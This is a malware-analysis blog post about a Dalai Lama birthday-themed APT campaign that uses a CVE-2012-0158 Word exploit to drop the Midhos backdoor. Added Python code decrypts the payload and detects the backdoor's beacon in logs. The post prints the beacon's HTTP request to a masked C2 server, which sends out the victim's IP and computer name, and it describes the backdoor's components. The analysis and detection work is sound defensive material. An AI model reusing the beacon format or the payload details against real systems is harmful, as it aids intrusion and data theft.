A Gift for Dalai Lama’s Birthday

Recently, we wrote about the Dalai Lama being a frequent Mac user. While this is true for His Holiness, not all of his supporters use Macs yet.

You may wonder why this is relevant. Well, on the 6th of July His Holiness turns 77, a kind of round number, so it is no surprise that "Dalai Lama Birthday" attacks are already under way.

On July 3rd we noticed a new APT campaign using the e-mail subject "Dalai Lama's birthday on July 6 to be low-key affair":

Attached to the e-mail is a .DOC file that exploits CVE-2012-0158 (the MSCOMCTL.OCX ActiveX control vulnerability), a very common theme for these attacks (see New APT Attack Shows Technical Advance in Exploit Development).

This time, the exploit targets Windows-based computers.

The x86 shellcode in the .DOC file decrypts the main backdoor body in blocks of 1 KB with a simple "xor pos + ror 3" cipher, i.e. each byte is XORed with its position and rotated right by three bits:
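As an added illustration (this is not code from the post or from the malware itself), here is a Python decryptor for a cipher of that shape, applied block by block, together with a quick PE-header check on the output so an analyst can tell at once whether the decryption parameters were right. The per-byte order (XOR with the in-block offset, then rotate right by 3), the truncation of the offset to 8 bits and the reset of the counter at every 1 KB boundary are assumptions, since the post does not spell them out; the sample data is constructed.

```python
"""
Added example, not Kaspersky's code or the malware's own routine: a
decryptor for the "xor pos + ror 3" scheme described in the post, applied
in 1 KB blocks, plus a PE-header sanity check on the result.

Assumptions (the post does not state them): per byte, XOR with the byte's
offset inside the current block first, then rotate right by 3; the offset
is truncated to 8 bits; the counter restarts at every 1024-byte block.
If a real sample decrypts to garbage, try swapping the order (rotate first,
XOR second) or the rotation direction.
"""
import struct

BLOCK = 1024  # the post says the body is processed in 1 KB blocks


def ror8(b: int, n: int) -> int:
    """Rotate an 8-bit value right by n bits."""
    return ((b >> n) | (b << (8 - n))) & 0xFF


def rol8(b: int, n: int) -> int:
    """Rotate an 8-bit value left by n bits (inverse of ror8)."""
    return ((b << n) | (b >> (8 - n))) & 0xFF


def decrypt(buf: bytes) -> bytes:
    """Undo the assumed cipher: plaintext = ror8(cipher ^ offset_in_block, 3)."""
    out = bytearray(len(buf))
    for i, c in enumerate(buf):
        pos = i % BLOCK                  # offset inside the current 1 KB block
        out[i] = ror8(c ^ (pos & 0xFF), 3)
    return bytes(out)


def encrypt(buf: bytes) -> bytes:
    """Inverse of decrypt(); used here only to build test data."""
    out = bytearray(len(buf))
    for i, p in enumerate(buf):
        pos = i % BLOCK
        out[i] = rol8(p, 3) ^ (pos & 0xFF)
    return bytes(out)


def looks_like_pe(buf: bytes) -> bool:
    """Cheap check that a blob is a PE image: 'MZ' at offset 0 and
    'PE\\0\\0' at the e_lfanew offset stored at 0x3C."""
    if len(buf) < 0x40 or buf[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", buf, 0x3C)[0]
    return buf[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def build_fake_pe(size: int = 3000) -> bytes:
    """Constructed sample (not a real binary): just enough header to satisfy
    looks_like_pe(), padded past two block boundaries so the counter reset
    is exercised."""
    hdr = bytearray(b"MZ" + b"\x00" * 0x3E)          # 0x40-byte DOS header
    struct.pack_into("<I", hdr, 0x3C, 0x80)           # e_lfanew -> 0x80
    img = bytes(hdr) + b"\x00" * (0x80 - len(hdr)) + b"PE\x00\x00"
    return img + bytes((i * 7) & 0xFF for i in range(size - len(img)))


if __name__ == "__main__":
    blob = encrypt(build_fake_pe())     # stands in for the bytes carved from the .DOC
    print("raw blob looks like PE:", looks_like_pe(blob))
    plain = decrypt(blob)
    print("decrypted blob looks like PE:", looks_like_pe(plain))
```

On a real sample the input would be the encrypted region carved out of the document; if looks_like_pe() still fails after decryption, the order or direction of the two operations is the first thing to flip.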

Once the main backdoor body is decrypted, it is dropped to disk as "CONIME.EXE". This in turn drops a DLL (CONIME.DLL) and a configuration file (CONIME.INF). Note that the name mimics the legitimate Windows Console IME binary (conime.exe), so the file name alone is not a reliable indicator; check the path and the hash. We currently detect the two dropped components as Trojan.Win32.Midhos:

CONIME.dll detected as Trojan.Win32.Midhos.fuy

CONIME.exe detected as Trojan.Win32.Midhos.fuz

The DLL implements the main backdoor functionality through three exported functions:

  • CommunicateToClient
  • InstallProgram
  • RunProgram

As in other cases, the backdoor configuration file (CONIME.INF) is encrypted:

The encryption algorithm here is different: it is a loop that XORs the data with a variable key.

Once decrypted, the backdoor config can be read:

The Command and Control server address (61.178.77.*) is exactly the same as the one used in a previous attack we analyzed (see "New MacOS X backdoor variant used in APT attacks").

The backdoor attempts to connect to the C2 via HTTP on port 1080, to a server-side module named WinData{UWXYZ}.Dll, where the placeholder is a numeric identifier (1158 in the request below):

Here is the full HTTP request:

GET http://61.178.77.*:1080/WinData1158.Dll?HELO-STX-2*IP_ADDR*COMPUTERNAME*$ HTTP/1.0

In reply, the server answers with encrypted packets containing commands for the backdoor.
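As an added example (not code from the post), the following Python snippet scans proxy log lines for this beacon shape. It generalises the single request above to any WinData&lt;digits&gt;.Dll?HELO-STX-&lt;n&gt;*&lt;ip&gt;*&lt;host&gt;*$ request on port 1080 and pulls out the C2 host, the module name and the victim details the implant reports about itself. The log format and all addresses (RFC 5737 documentation ranges) are constructed, since the post masks the real C2 as 61.178.77.*, and the assumption that the module identifier is always numeric rests on the one request shown.

```python
"""
Added example, not Kaspersky's code: flag the Midhos "HELO" beacon in
proxy logs.  The log format and every IP address below are constructed
(documentation ranges); the real C2 in the post is masked as 61.178.77.*,
so the detection keys on the URL shape rather than on an address.
"""
import re

# GET http://<c2>:1080/WinData<digits>.Dll?HELO-STX-<n>*<victim ip>*<hostname>*$ HTTP/1.0
# Assumption: the module id is always numeric (1158 in the post's request).
BEACON_RE = re.compile(
    r"GET\s+http://(?P<c2>[^/\s:]+):1080/"
    r"(?P<module>WinData\d+\.Dll)\?HELO-STX-(?P<ver>\d+)"
    r"\*(?P<victim_ip>\d{1,3}(?:\.\d{1,3}){3})\*(?P<hostname>[^*\s]+)\*\$"
    r"\s+HTTP/1\.0"
)

# Constructed proxy lines: "<epoch> <client ip> <result> <request line>".
# Lines 2 and 3 are beacons; the others are look-alikes that must not match.
SAMPLE_LOG = [
    "1341318000.123 192.0.2.10 TCP_MISS/200 GET http://www.example.com/index.html HTTP/1.1",
    "1341318005.456 192.0.2.10 TCP_MISS/200 GET http://203.0.113.5:1080/WinData1158.Dll?HELO-STX-2*192.0.2.10*DESK-042*$ HTTP/1.0",
    "1341318010.789 198.51.100.4 TCP_MISS/200 GET http://203.0.113.5:1080/WinData2077.Dll?HELO-STX-2*10.0.0.25*LAPTOP-17*$ HTTP/1.0",
    "1341318012.000 192.0.2.12 TCP_MISS/404 GET http://cdn.example.net:1080/WinData.dll HTTP/1.1",
    "1341318013.500 192.0.2.13 TCP_MISS/200 GET http://203.0.113.5:1080/WinData1158.Dll HTTP/1.0",
]


def parse_beacon(line: str):
    """Return a dict of beacon fields for a matching log line, else None."""
    m = BEACON_RE.search(line)
    if not m:
        return None
    fields = line.split(None, 3)
    src = fields[1] if len(fields) > 1 else ""
    hit = m.groupdict()
    hit["src"] = src
    # The implant reports its own local address; a mismatch with the proxy's
    # client address usually just means NAT, but it is worth surfacing because
    # the reported address tells you which internal host to go and image.
    hit["ip_matches_src"] = hit["victim_ip"] == src
    return hit


def find_midhos_beacons(lines):
    """Scan an iterable of log lines and return every beacon found."""
    return [h for h in (parse_beacon(l) for l in lines) if h]


if __name__ == "__main__":
    for hit in find_midhos_beacons(SAMPLE_LOG):
        print(f"{hit['src']} -> {hit['c2']} {hit['module']} "
              f"victim={hit['hostname']} ({hit['victim_ip']}) "
              f"nat={'yes' if not hit['ip_matches_src'] else 'no'}")
```

The HTTP/1.0 version and the fixed port 1080 are part of the pattern on purpose: a proxy that rewrites the request line to HTTP/1.1 will need the last alternative relaxed, but otherwise both help keep the rule from firing on unrelated traffic to a WinData-named resource.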

When the exploit succeeds, a decoy document is displayed instead, containing an article lifted from "The Tribune, Chandigarh", an Indian newspaper. The original article was written by Lalit Mohan:

High-profile personalities such as Tenzin Gyatso, the current Dalai Lama, are constant targets for APT attackers. With the Dalai Lama's 77th birthday coming up on July 6, we expect such attacks to intensify.

Over the past month we have seen almost 500 reports of Trojan.Win32.Midhos, a family of backdoors used by these particular APT attackers.

The vast majority of victims are located in the USA, Italy, Canada, the UK and Germany.

Additionally, we have pointed out in the past that many of these APT (Advanced Persistent Threat) attacks are not exactly "advanced". In many cases they are not so "persistent" either: they are detected very quickly by antivirus products and removed from the systems.

But one thing they certainly are: insistent.


  1. G

    So there were 477 reports, of which 137 in the US, 56 in Italy, 19 in France, 16 in Poland, 11 in Spain and 10 in Belgium.
